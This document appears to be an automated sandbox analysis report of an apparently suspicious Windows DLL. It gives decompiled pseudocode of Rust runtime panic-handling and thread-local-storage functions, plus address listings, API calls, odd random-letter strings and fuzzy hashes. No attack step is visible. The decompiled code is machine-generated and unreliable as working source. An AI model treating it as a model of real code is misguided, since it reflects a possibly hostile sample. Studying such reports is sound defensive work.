												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6e4fadc8 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6E4AC800(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6E4C6EE0(_t264, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6e4ed050, 0x6e4ed720);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6E4AC690(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6E4AC800(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6e4ed8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6e4ade50;
										_v60 =  &_v100;
										_v56 = 0x6e4ade50;
										_v52 =  &_v148;
										_v48 = E6E4ADE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6E4AD2A0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6e4fadc8, 0, _t245);
											}
											HeapFree( *0x6e4fadc8, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6e4fadac);
											_v68 = 0x6e4ed2c0;
											_v64 = 1;
											_v152 = 0x6e4fadac;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6E4ADEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6E4AD2A0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6e4fadac);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6E4AC800(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6E4ADC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6e4fadbc);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6e4eda8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6e4ecd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6E4AD2A0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6E4AD460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6E4AD440(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6e4fa040 = 0;
											_t356 =  *0x6e4fa040;
											if( *0x6e4fa040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6e4ed96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6e4ecd60;
											_v48 = 0;
											_v20 = 3;
											if(E6E4AD2A0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6e4fadc8, 0, _t235);
											}
											HeapFree( *0x6e4fadc8, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}






























































































                          0x6e4ac8cc
                          0x6e4ac8cf
                          0x6e4ac8d6
                          0x6e4ac8dd
                          0x6e4ac8e2
                          0x6e4ac8e7
                          0x6e4ac8f0
                          0x6e4ac8f3
                          0x6e4ac8f9
                          0x6e4ac901
                          0x6e4ac906
                          0x6e4ac908
                          0x6e4ac922
                          0x6e4ac927
                          0x6e4ac92a
                          0x6e4ac92a
                          0x6e4ac92e
                          0x6e4ac931
                          0x6e4ac934
                          0x6e4ac936
                          0x6e4ac9aa
                          0x6e4ac9ad
                          0x6e4aca0a
                          0x6e4aca11
                          0x6e4aca1b
                          0x6e4aca22
                          0x6e4aca29
                          0x6e4aca2d
                          0x6e4aca34
                          0x6e4aca3b
                          0x6e4aca41
                          0x6e4aca44
                          0x6e4aca47
                          0x6e4aca4d
                          0x6e4aca54
                          0x6e4aca57
                          0x6e4aca5e
                          0x6e4aca63
                          0x6e4aca65
                          0x6e4aca6c
                          0x6e4aca74
                          0x6e4aca77
                          0x6e4aca79
                          0x6e4aca7c
                          0x6e4aca7c
                          0x6e4aca7f
                          0x6e4aca82
                          0x6e4aca86
                          0x6e4aca88
                          0x6e4aca8a
                          0x6e4aca8e
                          0x6e4aca90
                          0x6e4aca90
                          0x6e4aca9c
                          0x6e4aca9c
                          0x6e4acaaa
                          0x6e4acaaa
                          0x00000000
                          0x6e4aca65
                          0x6e4ac9b2
                          0x6e4ac9b5
                          0x6e4ac9bc
                          0x6e4ac9c3
                          0x6e4ac9ca
                          0x6e4ac9d1
                          0x6e4ac9d5
                          0x6e4ac9dc
                          0x6e4ac9e3
                          0x6e4ac9e8
                          0x6e4ac9ea
                          0x00000000
                          0x6e4ac9f0
                          0x6e4ac9f5
                          0x6e4ac9fd
                          0x6e4aca00
                          0x6e4aca02
                          0x00000000
                          0x6e4aca02
                          0x6e4ac93d
                          0x6e4ac93d
                          0x6e4ac945
                          0x6e4ac94b
                          0x6e4ac955
                          0x6e4ac95c
                          0x6e4ac963
                          0x6e4ac969
                          0x6e4ac96c
                          0x6e4ac96f
                          0x6e4ac972
                          0x6e4ac975
                          0x6e4ac97a
                          0x6e4ac97d
                          0x6e4ac97f
                          0x6e4acab3
                          0x6e4acab3
                          0x6e4acab6
                          0x6e4acab8
                          0x6e4acb8b
                          0x6e4acb90
                          0x6e4acb93
                          0x6e4acb96
                          0x6e4acd97
                          0x00000000
                          0x6e4acd97
                          0x6e4acb9c
                          0x6e4acb9f
                          0x6e4acd90
                          0x00000000
                          0x6e4acd90
                          0x6e4acba5
                          0x6e4acba7
                          0x00000000
                          0x00000000
                          0x6e4acbb0
                          0x6e4acbb5
                          0x6e4acbb8
                          0x6e4acbbb
                          0x6e4acbbd
                          0x00000000
                          0x00000000
                          0x6e4acbc3
                          0x00000000
                          0x6e4acbc3
                          0x6e4acabe
                          0x00000000
                          0x6e4ac985
                          0x6e4ac99d
                          0x6e4ac9a2
                          0x6e4acdbe
                          0x6e4acdbe
                          0x6e4acdc0
                          0x6e4acdc0
                          0x6e4acdc5
                          0x6e4acaf3
                          0x6e4acaf3
                          0x6e4acaf6
                          0x6e4acaf9
                          0x6e4acb00
                          0x6e4acb02
                          0x6e4acb07
                          0x6e4acb07
                          0x6e4acb0d
                          0x6e4acb16
                          0x6e4acbf3
                          0x6e4acbf3
                          0x6e4acbf8
                          0x6e4acbfa
                          0x6e4acbfc
                          0x6e4acc01
                          0x6e4acc01
                          0x6e4acc07
                          0x6e4acc0d
                          0x6e4acc0f
                          0x6e4acdcf
                          0x6e4acdd4
                          0x6e4acdd6
                          0x6e4acde6
                          0x6e4acdeb
                          0x6e4acdf0
                          0x6e4acdf2
                          0x6e4ace32
                          0x6e4ace38
                          0x6e4ace3f
                          0x6e4ace41
                          0x6e4ace46
                          0x6e4ace48
                          0x6e4ace4f
                          0x6e4ace52
                          0x6e4ace57
                          0x6e4ace57
                          0x6e4ace5c
                          0x00000000
                          0x6e4ace5c
                          0x6e4acdf4
                          0x6e4acdfe
                          0x6e4ace03
                          0x6e4ace05
                          0x6e4ace05
                          0x6e4ace08
                          0x6e4ace0b
                          0x6e4ace0e
                          0x6e4aceb8
                          0x6e4acebe
                          0x6e4acec9
                          0x6e4acec9
                          0x6e4acece
                          0x6e4acece
                          0x6e4aced0
                          0x6e4aced0
                          0x6e4aced2
                          0x6e4acedd
                          0x6e4acedd
                          0x6e4acee2
                          0x6e4acee2
                          0x6e4aceed
                          0x6e4acef5
                          0x6e4acef8
                          0x6e4acefb
                          0x6e4acefb
                          0x6e4acefb
                          0x6e4acac1
                          0x6e4acac1
                          0x6e4acac7
                          0x6e4acaca
                          0x6e4acaca
                          0x6e4acad0
                          0x6e4acad3
                          0x6e4acad5
                          0x6e4acae3
                          0x6e4acae3
                          0x6e4acae5
                          0x6e4acbcd
                          0x6e4acbd0
                          0x6e4acbde
                          0x6e4acbe0
                          0x00000000
                          0x00000000
                          0x6e4acbe6
                          0x6e4acbe9
                          0x6e4acbeb
                          0x00000000
                          0x6e4acbeb
                          0x6e4acaeb
                          0x6e4acaee
                          0x6e4acaf0
                          0x00000000
                          0x6e4acaf0
                          0x6e4acec0
                          0x6e4acec2
                          0x00000000
                          0x6e4acec2
                          0x6e4ace14
                          0x6e4ace17
                          0x00000000
                          0x00000000
                          0x6e4ace1d
                          0x6e4ace20
                          0x00000000
                          0x00000000
                          0x6e4ace26
                          0x6e4ace28
                          0x00000000
                          0x6e4ace28
                          0x6e4acdd8
                          0x6e4acddd
                          0x6e4acddf
                          0x00000000
                          0x00000000
                          0x6e4acde1
                          0x00000000
                          0x6e4acc15
                          0x6e4acc15
                          0x6e4acc17
                          0x6e4acc1a
                          0x6e4ace62
                          0x6e4ace62
                          0x6e4ace65
                          0x6e4ace68
                          0x6e4ace68
                          0x6e4ace6b
                          0x6e4ace71
                          0x6e4ace78
                          0x6e4ace7f
                          0x6e4ace85
                          0x6e4ace87
                          0x6e4ace8d
                          0x6e4ace90
                          0x6e4ace96
                          0x6e4ace96
                          0x6e4ace90
                          0x6e4ace87
                          0x00000000
                          0x6e4ace7f
                          0x6e4acc20
                          0x6e4acc27
                          0x6e4acc2e
                          0x6e4acc2e
                          0x00000000
                          0x6e4acc2e
                          0x6e4acb1c
                          0x6e4acb1f
                          0x6e4acb21
                          0x00000000
                          0x00000000
                          0x6e4acb27
                          0x6e4acb2a
                          0x6e4acb2d
                          0x6e4acdb6
                          0x6e4acdbb
                          0x00000000
                          0x6e4acdbb
                          0x6e4acb33
                          0x6e4acb39
                          0x6e4acb3e
                          0x6e4acb40
                          0x6e4acb43
                          0x6e4acb4a
                          0x6e4acb4f
                          0x6e4acb52
                          0x6e4acb54
                          0x6e4acb57
                          0x6e4acb59
                          0x6e4acb5b
                          0x6e4acb5e
                          0x6e4acb60
                          0x6e4acb63
                          0x6e4acb63
                          0x6e4acb5e
                          0x6e4acb68
                          0x6e4acb68
                          0x6e4acb6b
                          0x6e4acb6e
                          0x6e4acaaf
                          0x6e4acaaf
                          0x6e4acab1
                          0x00000000
                          0x6e4acb74
                          0x6e4acb74
                          0x6e4acb78
                          0x6e4acb7b
                          0x6e4acb7e
                          0x6e4acea0
                          0x6e4acea6
                          0x6e4acea8
                          0x6e4aceab
                          0x6e4ad062
                          0x6e4ad062
                          0x6e4ad067
                          0x6e4ad068
                          0x6e4ad068
                          0x6e4acc30
                          0x6e4acc37
                          0x6e4acc3e
                          0x6e4acc45
                          0x6e4acc4c
                          0x6e4acc50
                          0x6e4acc57
                          0x6e4acc5e
                          0x6e4acc65
                          0x6e4acc6d
                          0x6e4acc70
                          0x6e4acc76
                          0x6e4acc79
                          0x6e4acc7f
                          0x6e4acc85
                          0x6e4acc8c
                          0x6e4acc95
                          0x6e4acc9c
                          0x6e4acca2
                          0x6e4acca9
                          0x6e4accac
                          0x6e4accba
                          0x6e4accc1
                          0x6e4accc9
                          0x6e4acccc
                          0x6e4accce
                          0x6e4accd1
                          0x6e4accd4
                          0x6e4accdb
                          0x6e4accdd
                          0x6e4acce3
                          0x6e4acce5
                          0x6e4acce5
                          0x6e4accf1
                          0x6e4accf1
                          0x6e4accff
                          0x6e4accff
                          0x6e4acd04
                          0x6e4acd15
                          0x6e4acd1a
                          0x6e4acf0b
                          0x6e4acf1a
                          0x6e4acf21
                          0x6e4acf28
                          0x6e4acf32
                          0x6e4acf35
                          0x6e4acf3c
                          0x6e4acf43
                          0x6e4acf49
                          0x6e4acf50
                          0x6e4acf53
                          0x6e4acf5a
                          0x6e4acf5f
                          0x6e4acf68
                          0x6e4acf6e
                          0x6e4acf71
                          0x00000000
                          0x00000000
                          0x6e4acf78
                          0x6e4acf80
                          0x6e4acf83
                          0x6e4acf85
                          0x00000000
                          0x6e4acd20
                          0x6e4acd23
                          0x6e4acfc0
                          0x6e4acfc3
                          0x6e4acfc5
                          0x6e4acfc7
                          0x6e4acfca
                          0x6e4acfcf
                          0x6e4acfcf
                          0x6e4acfca
                          0x6e4acfd7
                          0x6e4acfdd
                          0x6e4acfe3
                          0x6e4acfe5
                          0x6e4acfe7
                          0x6e4acfea
                          0x6e4acfef
                          0x6e4acfef
                          0x6e4acfea
                          0x6e4acff9
                          0x6e4acfff
                          0x6e4ad003
                          0x6e4ad00a
                          0x6e4ad012
                          0x6e4ad019
                          0x6e4ad020
                          0x6e4ad027
                          0x6e4ad02e
                          0x6e4ad032
                          0x6e4ad039
                          0x6e4ad040
                          0x6e4ad048
                          0x6e4ad04b
                          0x6e4ad04e
                          0x6e4ad053
                          0x6e4ad055
                          0x6e4ad055
                          0x6e4ad057
                          0x6e4ad05b
                          0x6e4ad060
                          0x00000000
                          0x6e4ad060
                          0x6e4acd2b
                          0x6e4acd31
                          0x6e4acd33
                          0x00000000
                          0x00000000
                          0x6e4acd3c
                          0x6e4acd3f
                          0x6e4acd46
                          0x6e4acd4d
                          0x6e4acd54
                          0x6e4acd5b
                          0x6e4acd62
                          0x6e4acd70
                          0x00000000
                          0x00000000
                          0x6e4acd7b
                          0x6e4acd7e
                          0x6e4acd86
                          0x6e4acd88
                          0x6e4acf88
                          0x6e4acf8b
                          0x6e4acf92
                          0x6e4acf9b
                          0x6e4acf9d
                          0x6e4acf9f
                          0x6e4acf9f
                          0x6e4acfab
                          0x6e4acfab
                          0x6e4acfbb
                          0x00000000
                          0x6e4acfbb
                          0x6e4acd1a
                          0x6e4aceb1
                          0x00000000
                          0x6e4aceb1
                          0x6e4acb84
                          0x00000000
                          0x6e4acb84
                          0x6e4acb6e
                          0x6e4acb16
                          0x6e4ac97f

                          APIs
                            • Part of subcall function 6E4AD1B0: TlsGetValue.KERNEL32(00000000,00000001,6E4AC906), ref: 6E4AD1BB
                            • Part of subcall function 6E4AD1B0: TlsGetValue.KERNEL32(00000000), ref: 6E4AD1F3
                          • AcquireSRWLockShared.KERNEL32(6E4FADBC), ref: 6E4AC945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4ACA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4ACAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4ACB0D
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4ACC07
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4ACCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4ACCFF
                          • GetProcessHeap.KERNEL32 ref: 6E4ACDD8
                          • HeapAlloc.KERNEL32(005B0000,00000000,00000010), ref: 6E4ACDEB
                          • TlsSetValue.KERNEL32(00000000,00000000,005B0000,00000000,00000010), ref: 6E4ACE5C
                          • HeapFree.KERNEL32(00000000,00000000,005B0000,00000000,00000010), ref: 6E4ACEDD
                          Strings
                          • full, xrefs: 6E4ACEB8
                          • Y3Kn, xrefs: 6E4AC8C5
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6E4AC90D, 6E4AC988
                          • already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl, xrefs: 6E4ACDA1
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E4ACDC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$FreeValue$AcquireAllocLockProcessShared
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3Kn$already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf$full
                          • API String ID: 2275035175-2562584196
                          • Opcode ID: 08eb32b55e021cd629c6f676feb8c1379a8cc3fd2b541bcd3d8fd1a9dabbe111
                          • Instruction ID: 7d1d266a1232f88bf1ffaa08ef35b85c57b0e559dea1ca1b43c94141a842cf9d
                          • Opcode Fuzzy Hash: 08eb32b55e021cd629c6f676feb8c1379a8cc3fd2b541bcd3d8fd1a9dabbe111
                          • Instruction Fuzzy Hash: FD123670A00219CFDB50CFF8C854B9EBBB5BF55329F10851ADA15AB388D776A846CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC890, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 409memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6E4AC890(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void* _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6E4B3B50;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6e4ed9cc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6e4fadc0], esi");
				_t193 = E6E4AD1B0(_t268, 0x6e4ed9cc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6E4C6EE0(_t268,  &M6E4ED0E7, 0x46, _t349,  &_v68, 0x6e4ed060, 0x6e4ed1ac);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6e4ecd60;
						_v120 = 0x6e4ed014;
						_v68 = 0x6e4eda50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6E4A2640;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6E4AD2A0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6e4fadc8, 0, _t259);
							}
							_t197 = HeapFree( *0x6e4fadc8, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6e4eda14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6e4ecd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6E4AD2A0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6e4fadbc);
					_v144 = 0x6e4fadbc;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6E4AD1B0(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6e4fadb0; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6E4AD530(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6E4C6EE0(_t268,  &M6E4ED0E7, 0x46, _t352,  &_v68, 0x6e4ed060, 0x6e4ed1ac);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6e4fa044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6e4fa044;
							_t205 = E6E4B2B10(_t268, 0x6e4fa044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6e4fa044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6e4fa044;
								_t206 = E6E4B2B10(_t268, 0x6e4fa044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6e4fadc8; // 0x5b0000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6e4fa044;
										_t340 = _t208;
										_t209 =  *0x6e4fa044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6E4B2B10(_t268, 0x6e4fa044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6E4C6C30(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6e4fadc8, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6e4fadb0;
											 *0x6e4fadb0 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6e4b3440
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
